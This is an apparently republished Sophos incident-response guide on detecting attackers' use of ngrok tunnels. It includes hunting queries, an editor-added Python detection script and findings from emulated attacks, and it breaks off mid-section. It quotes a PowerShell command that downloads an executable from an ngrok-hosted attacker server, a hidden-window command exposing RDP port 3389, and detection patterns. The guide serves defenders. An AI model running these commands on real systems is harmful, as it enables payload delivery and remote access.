{"id":19594,"date":"2022-07-14T01:20:58","date_gmt":"2022-07-14T09:20:58","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/07\/14\/news-13327\/"},"modified":"2022-07-14T01:20:58","modified_gmt":"2022-07-14T09:20:58","slug":"news-13327","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/07\/14\/news-13327\/","title":{"rendered":"Rapid Response: The Ngrok Incident Guide"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/07\/122024889_m.jpg\"\/><\/p>\n<p><strong>Credit to Author: Angela Gunn | Date: Thu, 14 Jul 2022 08:01:51 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p><em>This article is part of a series of step-by-step incident guides created by the Sophos Rapid Response team to help incident responders and security-operations teams identify and remediate widely seen threat tools, techniques, and behaviors.<\/em><\/p>\n<p><b><span data-contrast=\"auto\">What Is Ngrok and How Is It Used by Threat Actors?<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Ngrok is a cross-platform tool that exposes local network ports to the internet via secure tunneling. It provides secure tunnels between the internet and computer systems that sit behind a firewall or Network Address Translation (NAT) device, and which use the Transmission Control Protocol (TCP). Once a port has been chosen as the desired communication channel, the necessary tunneling configuration is set up within the ngrok process. 
Ngrok\u2019s cloud service relays two-way network traffic to the running ngrok process, which in turn forwards it to the specified local port.<\/span><\/p>\n<p><span data-contrast=\"auto\">A limited version of the tool is freely available at <\/span><a href=\"https:\/\/ngrok.com\/\"><span data-contrast=\"none\">ngrok.com<\/span><\/a><span data-contrast=\"auto\"> for noncommercial use, and a fuller-featured version can be licensed for commercial use. Unfortunately, it also figures in various attack strategies: malicious actors use its tunneling capabilities to reach command-and-control (C2) servers, download malicious code, and so on while bypassing network protections.<\/span><\/p>\n<p><span data-contrast=\"auto\">Other likely reasons for its popularity with attackers include:<\/span><\/p>\n<ul>\n<li>It is used for legitimate business reasons, so it is not classed as malware by default<\/li>\n<li>It operates over commonly open ports, such as 443<\/li>\n<li>It has no direct file dependencies<\/li>\n<li>It is easily configured<\/li>\n<li>It supports any network service that uses TCP<\/li>\n<li>It creates raw TCP tunnels, so a local service such as RDP on port 3389 can be exposed for access across the internet<\/li>\n<li>It lets adversaries retrieve payloads through public ngrok services, since all of the traffic passes through ngrok URLs rather than an attacker-owned address<\/li>\n<\/ul>\n<p><b><span data-contrast=\"auto\">Incident Guide Context<\/span><\/b><span 
data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This guide only addresses the investigation and mitigation of incidents involving the detection of ngrok on the network. <\/span><i><span data-contrast=\"auto\">We strongly recommend that responders ascertain whether ngrok is in use on their network for legitimate purposes before proceeding with mitigation.<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The guide uses features of\u202f<\/span><a href=\"https:\/\/www.sophos.com\/en-us\/products\/endpoint-antivirus\/xdr\"><span data-contrast=\"none\">Sophos XDR<\/span><\/a><span data-contrast=\"none\">, <\/span><span data-contrast=\"auto\">such as Live Discover and Live Response, to illustrate the steps defenders can take. Security professionals that are not using Sophos XDR but have access to other tools such as\u202f<\/span><a href=\"https:\/\/osquery.io\/\"><span data-contrast=\"none\">OSQuery<\/span><\/a><span data-contrast=\"auto\">\u202fcan adapt and apply the information to their needs.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Queries and commands referenced in the guide are some of the methods used by the\u202f<\/span><a href=\"https:\/\/www.sophos.com\/en-us\/products\/managed-threat-response\/rapid-response\"><span data-contrast=\"none\">Sophos Rapid Response<\/span><\/a><span data-contrast=\"auto\">\u202fteam during incident engagements. 
They are recommendations only; there will be other ways of accomplishing each task.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Any instructions to remove items should be double-checked to prevent the accidental removal of legitimate client configurations.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h3><b><span data-contrast=\"auto\">Investigate<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">The goal of this section is to establish if there are any Indicators of Compromise (IOC) on the affected system that are related to ngrok. In subsequent sections we will provide steps to analyze and respond to the results of investigation. For purposes of illustration, we will draw on two separate response scenarios in these sections. 
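<\/span><\/p>\n<p>Before walking through those scenarios, here is an added example of the kind of triage logic the queries in this guide express, written by the editor in Python; it is not code from the guide and not Sophos tooling. It applies the static indicator used throughout the guide, the string &#8216;ngrok&#8217;, to constructed samples of a process list, DNS-journal names, HTTP-journal request lines and PSReadLine history, and it also parses the free-tier hostname form seen in the findings (3812-84-69-26-216.ngrok.io): on the editor\u2019s reading of that naming scheme, the trailing dash-separated groups are the tunnel client\u2019s public IPv4 address, a pivot value that a bare %ngrok% match throws away. The sample records, the function names and the ngrok apex domains beyond ngrok.io are the editor\u2019s assumptions, not content from the original page.<\/p>\n
```python
import re

# Constructed sample telemetry (not real data), shaped like the sources this
# guide queries: a process list, DNS-journal names, HTTP-journal request
# lines, and PSReadLine ConsoleHost_history.txt lines.
SAMPLE_PROCESSES = [
    {'pid': 4120, 'name': 'ngrok.exe', 'parent': 'powershell.exe', 'cmdline': 'ngrok.exe tcp 3389'},
    {'pid': 988, 'name': 'svchost.exe', 'parent': 'services.exe', 'cmdline': 'svchost.exe -k netsvcs'},
    {'pid': 5310, 'name': 'ngrok.exe', 'parent': 'cmd.exe', 'cmdline': 'ngrok http 443'},
]
SAMPLE_DNS = [
    '3812-84-69-26-216.ngrok.io',
    'login.microsoftonline.com',
    'c5a8-84-69-26-216.ngrok.io',
    'tunnel.ngrok.com',   # constructed, agent control-channel style name
    'notngrok.io',        # must NOT match (a plain LIKE '%ngrok%' would)
]
SAMPLE_HTTP = [
    'GET /Advanced_IP_Scanner_2.5.3850.exe HTTP/1.1 Host: c5a8-84-69-26-216.ngrok.io Connection: Keep-Alive',
    'GET /favicon.ico HTTP/1.1 Host: www.example.com Connection: Keep-Alive',
]
SAMPLE_PSREADLINE = [
    'Get-Process',
    r'''(new-object System.Net.WebClient).DownloadFile('https://3812-84-69-26-216.ngrok.io/Advanced_IP_Scanner_2.5.3850.exe','C:\Perflogs\IP.exe')''',
]

# ngrok.io is the apex seen in this guide; the others are the editor's
# addition, covering hostnames the service also issues.
NGROK_APEX = ('ngrok.io', 'ngrok.com', 'ngrok.app', 'ngrok-free.app', 'ngrok.dev')
# Free-tier label form from the guide (3812-84-69-26-216): a hex tag followed
# by what the editor reads as the tunnel client's public IPv4 address,
# dots replaced by dashes.
FREE_TIER_LABEL = re.compile(r'^[0-9a-f]{4}-(\d{1,3})-(\d{1,3})-(\d{1,3})-(\d{1,3})$', re.I)
# 'ngrok tcp 3389', 'C:\Tools\ngrok.exe http 443', 'ngrok start --all' ...
NGROK_CMDLINE = re.compile(r'(^|[\\/\s])ngrok(\.exe)?\s+(tcp|http|tls|start)\b(.*)$', re.I)
HOST_IN_TEXT = re.compile(r'[A-Za-z0-9.-]+\.ngrok(?:-free)?\.(?:io|com|app|dev)', re.I)


def classify_host(host):
    '''Return (is_ngrok, origin_ip). origin_ip is the client's public IPv4
    address when the free-tier label embeds it, otherwise None.'''
    h = host.strip().lower().rstrip('.')
    apex = next((a for a in NGROK_APEX if h == a or h.endswith('.' + a)), None)
    if apex is None:
        return (False, None)
    label = h[:-len(apex) - 1] if h != apex else ''
    m = FREE_TIER_LABEL.match(label.split('.')[0]) if label else None
    return (True, '.'.join(m.groups()) if m else None)


def hunt(processes, dns, http, psreadline):
    '''Apply the guide's static indicator ('ngrok') to each source, keeping
    the structural detail a responder pivots on (tunnel type, port, host,
    embedded origin IP). Returns a list of finding dicts.'''
    findings = []
    for p in processes:
        m = NGROK_CMDLINE.search(p['cmdline'])
        if not (m or p['name'].lower().startswith('ngrok')):
            continue
        port = re.search(r'\b(\d{2,5})\b', m.group(4)) if m else None
        findings.append({'source': 'process', 'pid': p['pid'], 'parent': p['parent'],
                         'tunnel': m.group(3).lower() if m else None,
                         'port': int(port.group(1)) if port else None})
    for name in dns:
        is_ngrok, ip = classify_host(name)
        if is_ngrok:
            findings.append({'source': 'dns', 'host': name, 'origin_ip': ip})
    for line in http:
        for host in HOST_IN_TEXT.findall(line):
            findings.append({'source': 'http', 'host': host, 'origin_ip': classify_host(host)[1]})
    for line in psreadline:
        if 'ngrok' not in line.lower():
            continue
        m = re.search(r'https?://[^\s\'),]+', line)
        url = m.group(0) if m else None
        host = url.split('/')[2] if url else None
        findings.append({'source': 'psreadline', 'command': line, 'url': url,
                         'origin_ip': classify_host(host)[1] if host else None})
    return findings


def origin_ips(findings):
    '''Public IPv4 addresses recovered from free-tier hostnames: the address
    the tunnel client (here, the emulated attacker host) connected from.'''
    return sorted({f['origin_ip'] for f in findings if f.get('origin_ip')})


if __name__ == '__main__':
    results = hunt(SAMPLE_PROCESSES, SAMPLE_DNS, SAMPLE_HTTP, SAMPLE_PSREADLINE)
    for f in results:
        print(f)
    print('pivot IPs:', origin_ips(results))
```
\n<p>Run it as a script to print the findings. Note that notngrok.io is included on purpose and is not flagged, whereas the %ngrok% pattern used in the journal queries would match it, so hits on unfamiliar domains still deserve a look at the full hostname before anything is blocked.<\/p>\n<p><span data-contrast=\"auto\">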
We will occasionally use <span style=\"color: #99cc00\"><b>green<\/b><\/span> text to draw attention to significant details.<\/span><\/p>\n<p><b><span data-contrast=\"auto\"><u>Check for Live Processes<\/u><\/span><\/b><\/p>\n<p><span data-contrast=\"auto\">First, run a query on the network to check the currently running processes.<\/span><\/p>\n<p><span data-contrast=\"auto\">Sophos XDR customers can create and run new Live Discover queries to do this. If you are new to Live Discover, the <\/span><a href=\"https:\/\/developer.sophos.com\/getting-started-with-live-discover\"><span data-contrast=\"none\">help guide<\/span><\/a><span data-contrast=\"auto\"> can assist you in putting those together. The basic steps are as follows:<\/span><\/p>\n<ol>\n<li>Log in to Sophos Central, then go to Threat Analysis Center &gt; Live Discover<\/li>\n<li>Enable \u201cDesigner Mode\u201d<\/li>\n<li>Select \u201cCreate new query\u201d<\/li>\n<li>Give your query a name and description and select a category under which to store it. 
Be sure to select \u201cLive Endpoint\u201d<\/li>\n<li>Copy the SQL from the Rapid Response GitHub page: <a href=\"https:\/\/github.com\/SophosRapidResponse\/OSQuery\/blob\/main\/Process\/Process.01.0%20-%20List%20running%20processes.txt\">Process.01.0 \u2013 List running processes.txt<\/a><\/li>\n<li>Save the query<\/li>\n<\/ol>\n<ul>\n<li><strong>Live processes<\/strong>\n<ul>\n<li>ngrok.exe\n<ul>\n<li>ngrok is launched from the command line; likely parent processes include:\n<ul>\n<li>cmd.exe<\/li>\n<li>powershell.exe<\/li>\n<\/ul>\n<\/li>\n<li>Command-line parameters\n<ul>\n<li>RDP TCP 3389 tunnel\n<ul>\n<li><span style=\"color: #99cc00\"><strong>ngrok.exe tcp 3389<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<li>HTTP 443\n<ul>\n<li><span style=\"color: #99cc00\"><strong>ngrok http 443<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>In our example, we ran queries against the DNS journal, the HTTP journal, and PowerShell data, checking for any signs of ngrok. 
These are presented here along with the findings.<\/p>\n<ul>\n<li><u><strong>Journal testing: Downloaded IP Scanner payload via ngrok<\/strong><\/u>\n<ul>\n<li>Command invoked on the target computer\n<ul>\n<li>powershell.exe \/c (new-object System.Net.WebClient).DownloadFile(&#8216;https:\/\/3812-84-69-26-216.ngrok.io\/Advanced_IP_Scanner_2.5.3850.exe&#8217;,&#8217;C:\\Perflogs\\IP.exe&#8217;)\n<ul>\n<li><strong>https:\/\/3812-84-69-26-216.ngrok.io<\/strong> &gt; ngrok tunnel set up on the source computer (the emulated attacker command &amp; control host) and pointing at <strong>C:\\Perflogs\\Advanced_IP_Scanner_2.5.3850.exe<\/strong><\/li>\n<li><strong>Advanced_IP_Scanner_2.5.3850.exe<\/strong> &gt; payload on the source computer<\/li>\n<li><strong>C:\\Perflogs\\IP.exe<\/strong> &gt; location where the file is written to disk on the target computer<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>DNS journal<\/strong>\n<ul>\n<li><strong>Finding<\/strong> &gt; 3812-84-69-26-216.ngrok.io\n<ul>\n<li><strong>Dynamic<\/strong> (assigned per tunnel when using the free version) &gt; 3812-84-69-26-216<\/li>\n<li><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><b>ngrok<\/b><\/span><\/li>\n<li><strong>Query<\/strong> &gt; Sophos_dns_journal\n<ul>\n<li>Name\n<ul>\n<li>%ngrok%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>HTTP journal<\/strong>\n<ul>\n<li><strong>Finding<\/strong> &gt; no finding while the tunnel operated over port 443 rather than 80: the traffic is TLS-wrapped, so the request line and Host header are not visible to the journal\n<ul>\n<li><strong>Query<\/strong> &gt; Sophos_http_journal<\/li>\n<\/ul>\n<\/li>\n<li><strong>Finding<\/strong> (tunnel changed to port 80) &gt; c5a8-84-69-26-216.ngrok.io\/Advanced_IP_Scanner_2.5.3850.exe<\/li>\n<li>&#8220;GET \/Advanced_IP_Scanner_2.5.3850.exe HTTP\/1.1 Host: c5a8-84-69-26-216.ngrok.io Connection: Keep-Alive&#8221;<\/li>\n<li><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><b>ngrok<\/b><\/span><\/li>\n<li><strong>Query<\/strong> &gt; Sophos_http_journal\n<ul>\n<li>URL\n<ul>\n<li>%ngrok%<\/li>\n<\/ul>\n<\/li>\n<li>Header\n<ul>\n<li>%ngrok%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Grep PSReadLine<\/strong>\n<ul>\n<li><strong>Finding<\/strong> &gt; powershell.exe \/c (new-object System.Net.WebClient).DownloadFile(&#8216;https:\/\/3812-84-69-26-216.ngrok.io\/Advanced_IP_Scanner_2.5.3850.exe&#8217;,&#8217;C:\\Perflogs\\IP.exe&#8217;)<\/li>\n<li><strong>Static grep pattern<\/strong> &gt; &#8216;<span style=\"color: #99cc00\"><b>ngrok<\/b><\/span>&#8217;<\/li>\n<li><strong>Custom query<\/strong> &gt;\n<ul>\n<li>SELECT grep.*<br \/>\nFROM file<br \/>\nCROSS JOIN grep ON (grep.path = file.path)<br \/>\nWHERE<br \/>\nfile.path LIKE &#8216;C:\\Users\\%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt&#8217;<br \/>\nAND grep.pattern = &#8216;ngrok&#8217;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Sophos PowerShell events<\/strong>\n<ul>\n<li><strong>Finding<\/strong> &gt; powershell.exe \/c (new-object System.Net.WebClient).DownloadFile(&#8216;https:\/\/3812-84-69-26-216.ngrok.io\/Advanced_IP_Scanner_2.5.3850.exe&#8217;,&#8217;C:\\Perflogs\\IP.exe&#8217;)<\/li>\n<li><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><b>ngrok<\/b><\/span><\/li>\n<li><strong>Query<\/strong> &gt; sophos_powershell_events\n<ul>\n<li>script_text\n<ul>\n<li>%ngrok%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>File.01.0 &#8211; Files on disk (path)<\/strong>\n<ul>\n<li><strong>Finding<\/strong> &gt; the ngrok.yml configuration file, which holds the account auth token (this is the default location the ngrok agent reads when no config path is passed on the command line)<\/li>\n<li><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><b>ngrok.yml<\/b><\/span><\/li>\n<li><strong>Query<\/strong> &gt; $$path$$ &gt; C:\\users\\%\\.ngrok2\\ngrok.yml<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Moving on, we dig deeper into the DNS journal, the other journals, and other logged data. These options are presented here along with the findings.<\/p>\n<ul>\n<li><b><u>Journal testing: Creating port binding 3389 for RDP via ngrok<\/u><\/b>\n<ul>\n<li 
data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">Command invoked on the target computer<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">powershell.exe \/c Start-Process -WindowStyle Hidden -FilePath ngrok.exe -ArgumentList &#8216;tcp 3389&#8217;<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">PowerShell executes the ngrok application and binds the TCP port 3389 (file path assumes ngrok binary is within %system32%), hiding windows, and closing the terminal once the command has completed<\/span><span 
data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><b><span data-contrast=\"auto\">DNS Journal<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; tunnel.us.ngrok.com\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <strong><span style=\"color: #99cc00\">ngrok<\/span><\/strong><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" 
data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_dns_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Name\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">%grok%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Network Journal<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" 
data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; Source ::1 | Destination ::1 | DestinationPort 3389\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong>\u00a0&gt;<strong><span style=\"color: #99cc00\"> ::1 | 3389<\/span><\/strong><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_network_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" 
data-aria-level=\"2\">Source\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">::1<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Destination\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">::1<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Destination port\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" 
data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>File journal<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; C:\\Users\\unknown\\.ngrok2\\ngrok.yml\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" 